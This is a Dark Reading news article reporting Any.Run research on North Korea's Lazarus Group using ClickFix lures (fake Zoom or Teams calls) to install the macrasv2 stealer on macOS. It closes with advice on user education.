TechTarget and Informa Tech’s Digital Business Combine. TechTarget and Informa TechTarget and Informa Tech’s Digital Business Combine. Together, we power an unparalleled network of 220+ online properties covering 10,000+ granular topics, serving an audience of 50+ million professionals with original, objective content from trusted sources. We help you gain critical insights and make more informed decisions across your business priorities. Dark Reading Resource Library Black Hat News Omdia Cybersecurity Advertise Newsletter Sign-Up Newsletter Sign-Up Cybersecurity Topics Related Topics Application Security Cybersecurity Careers Cloud Security Cyber Risk Cyberattacks & Data Breaches Cybersecurity Analytics Cybersecurity Operations Data Privacy Endpoint Security ICS/OT Security Identity & Access Mgmt Security Insider Threats IoT Mobile Security Perimeter Physical Security Remote Workforce Threat Intelligence Vulnerabilities & Threats Recent in Cybersecurity Topics Cyberattacks & Data Breaches Chinese APT Abuses Multiple Cloud Tools to Spy on Mongolia Chinese APT Abuses Multiple Cloud Tools to Spy on Mongolia by Nate Nelson Apr 24, 2026 4 Min Read Cyber Risk 'Zealot' Shows What AI's Capable of in Staged Cloud Attack 'Zealot' Shows What AI's Capable of in Staged Cloud Attack by Jai Vijayan Apr 23, 2026 4 Min Read World Related Topics DR Global Middle East & Africa Asia Pacific Latin America See All The Edge DR Technology Events Related Topics Upcoming Events Podcasts Webinars SEE ALL Resources Related Topics Resource Library Newsletters Podcasts Reports Videos Webinars White Papers Partner Perspectives Dark Reading Resource Library Threat Intelligence Data Privacy Cybersecurity Operations Application Security News North Korea's Lazarus Targets macOS Users via ClickFix Lazarus continues leveraging ClickFix for initial access and data theft, in this case, against Mac-centric organizations and their high-value leaders. Alexander Culafi , Senior News Writer , Dark Reading April 24, 2026 4 Min Read Source: Alexey Stiop via Alamy Stock Photo North Korea's Lazarus Group is using ClickFix attacks to launch cyberattacks using novel macOS malware. That's according to security vendor Any.Run, which on April 21 published research concerning a new nation-state threat campaign. Authored by offensive security expert and Birmingham Cyber Arms founder Mauro Eldritch, the report covers a wave of ClickFix attacks targeting organizations, used to distribute a range of malware. This latest research focuses primarily on a newly identified macOS malware kit that is currently being leveraged in the wild. ClickFix is a social engineering technique that rose to prominence over the past year or so. A threat actor tricks the victim into visiting attacker-operated infrastructure, such as a website masquerading as a fake Zoom meeting. When the victim reaches the Web page, they are told there are technical issues that may only be resolved if they update their software. The attacker usually instructs the victim into running malicious code, either by copying and pasting a run command (on Windows) or downloading and opening a file with the code on it (typically in macOS). Related: Tropic Trooper APT Takes Aim at Home Routers, Japanese Targets ClickFix has been a favorite tactic of North Korean threat actors lately . Entities like Lazarus Group use it for initial access, with the ultimate goal of stealing cryptocurrency or intellectual property, or to conduct espionage. In this latest campaign, Lazarus Group is targeting FinTech, cryptocurrency, and high-value leaders in organizations with a substantial reliance on macOS devices. The Complete macOS Malware Attack Chain According to Eldritch, an attacker contacts a business leader through Telegram, often by using a compromised account belonging to a colleague or contact known to the target. The attacker sends the target a fake Zoom, Microsoft Teams, or Google Meet invitation to set up a conversation under the pretense of a business opportunity. North Korean actors have also used a potential job offer as a lure. The target joins the call and is prompted to enter a command to fix connection issues. Because the command is entered by the user, many traditional security controls remain untriggered. And because users are conditioned to agree to taking actions like updating software, techniques like ClickFix might not raise as many red flags to the user as a traditional phishing email. Especially when the attacker uses a business meeting as a means of lowering the target's guard ahead of time. Then, "the operation is focused on extracting business value as quickly as possible," the blog post read. "The attacker collects credentials, browser sessions, and system-stored secrets, including macOS Keychain data." Such assets can then provide access to corporate systems, software-as-a-service (SaaS) platforms, and financial resources, Any.Run added. Related: Africa Relinquishes Cyberattack Lead to Latin America — For Now Once the user enters the command and connects to attacker infrastructure, malware is downloaded as a macOS application .bin file under an unassuming name, like "teamsSDK.bin." This application installs the second stage binary and includes additional ways of gaining the user's trust, such as a message saying software is updated. The next binary is a system profiler that connects to attacker-hosted command-and-control (C2) infrastructure. This is then followed by a persistence mechanism that re-invokes the malware kit at every login before the primary component, a stealer named "macrasv2," is loaded. The stealer stages previously collected data like browser extension data, stored browser credentials and cookies, macOS keychain entries, and more, and consolidates them into a temporary directory for exfiltration through Telegram. Macrasv2 then runs a self-deletion script and the infection chain is complete. While many North Korean state-sponsored attacks are sophisticated in nature, Eldritch noted that macrasv2 is "badly written." Several components remain either unimplemented or incorrectly implemented, while some components enter "infinite loops that may expose its presence due to system resource starvation." The malware also left multiple operational security weaknesses, including exposed Telegram bot tokens and C2 endpoints with missing authentication. Related: 'The Gentlemen' Rapidly Rises to Ransomware Prominence How to Avoid ClickFix Compromise While Any.Run's blog contains indicators of compromise, it must also be noted that no matter how sophisticated an attack chain may seem, ClickFix only works if the end user runs a command or downloads a file. As such, the best way for organizations to combat ClickFix is to educate leaders and employees on how the technique works and why it's successful, and not to run suspicious commands or open files as a means to solve connectivity problems. Dark Reading has reached out to Any.Run for additional comment. About the Author Alexander Culafi Senior News Writer, Dark Reading Alex is an award-winning writer, journalist, and podcast host based in Boston. After cutting his teeth writing for independent gaming publications as a teenager, he graduated from Emerson College in 2016 with a Bachelor of Science in journalism. He has previously been published on VentureFizz, Search Security, Nintendo World Report, and elsewhere. In his spare time, Alex hosts the weekly Nintendo podcast Talk Nintendo Podcast and works on personal writing projects, including two previously self-published science fiction novels. See more from Alexander Culafi Want more Dark Reading stories in your Google search results? Add Us Now More Insights Industry Reports The Agentic SOC: Exploring the Practitioner Mindset as AI Permeates SecOps The Total Economic Impact™ Of Google SecOps The Business Value of Google Threat Intelligence The Total Economic Impact™ Of Google SecOps AI-driven SecOps: Transforming Financial Services Security Access More Research Webinars Implementing CTEM: Beyond Vulnerability Management Defending Against AI-Powered Attacks: The Evolution of Adversarial Machine Learning Tips for Managing Cloud Security in a Hybrid Environment? Zero Trust Architecture for Cloud environments: Implementation Roadmap Security in the AI Age More Webinars Editor's Choice Vulnerabilities & Threats EDR-Killer Ecosystem Expansion Requires Stronger BYOVD Defenses EDR-Killer Ecosystem Expansion Requires Stronger BYOVD Defenses by Rob Wright Apr 14, 2026 8 Min Read Want more Dark Reading stories in your Google search results? 2026 Security Trends & Outlooks Threat Intelligence Cybersecurity Predictions for 2026: Navigating the Future of Digital Threats Jan 2, 2026 Cyber Risk Navigating Privacy and Cybersecurity Laws in 2026 Will Prove Difficult Jan 12, 2026 | 7 Min Read Endpoint Security CISOs Face a Tighter Insurance Market in 2026 Jan 5, 2026 | 7 Min Read Threat Intelligence 2026: The Year Agentic AI Becomes the Attack-Surface Poster Child Jan 30, 2026 | 8 Min Read Download the Collection Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox. Subscribe Webinars Implementing CTEM: Beyond Vulnerability Management Thurs, May 21, 2026 at 1pm EST Defending Against AI-Powered Attacks: The Evolution of Adversarial Machine Learning Mon, May 11, 2026 at 1:00pm ET Tips for Managing Cloud Security in a Hybrid Environment? Thurs, May 7, 2026 at 1pm EST Zero Trust Architecture for Cloud environments: Implementation Roadmap Tues, May 12, 2026 at 1pm EST Security in the AI Age Tues, April 28, 2026 at 1pm EST More Webinars White Papers Reinventing the SOC with agentic AI Enhancing SecOps with Google Threat Intelligence Enhancing SecOps with Google Threat Intelligence Enhancing SecOps with Google Threat Intelligence Reinventing the SOC with agentic AI Explore More White Papers Discover M